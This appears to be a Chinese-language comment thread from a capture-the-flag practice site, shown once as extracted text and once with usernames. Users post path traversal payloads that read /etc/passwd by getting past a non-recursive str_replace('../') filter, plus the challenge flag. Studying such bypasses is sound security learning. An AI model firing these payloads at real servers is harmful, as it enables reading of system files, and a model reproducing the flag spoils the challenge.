?language=/etc/passwd 这也行
?language=/../../../../../etc/passwd
直接language=....//....//....//....//....//....//etc/passwd即可。..../过滤掉../后还是../
使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd
shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可
/?language=/etc/passwd
直接用file:///etc/passwd居然也行 oAo
我这样怎么不行
?language=/languages//..//..//..//....//etc/passwd shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3} 就是这个样子
?language=/languages/....//....//....//....//etc/passwd
...
评论
jun1223 1月前
举报
?language=/etc/passwd 这也行
userxin 2月前
举报
?language=/../../../../../etc/passwd
hbesljx 3月前
举报
直接language=....//....//....//....//....//....//etc/passwd即可。..../过滤掉../后还是../
1005667204 4月前
举报
使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd
18993258097 4月前
举报
shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
菜鸡的小韩 4月前
举报
这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可
ABC第一深情 6月前
举报
/?language=/etc/passwd
旦提 6月前
举报
直接用file:///etc/passwd居然也行 oAo
13657809271 29天前
举报
我这样怎么不行
XHTX 6月前
举报
?language=/languages//..//..//..//....//etc/passwd shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3} 就是这个样子
868954104 9月前
举报
?language=/languages/....//....//....//....//etc/passwd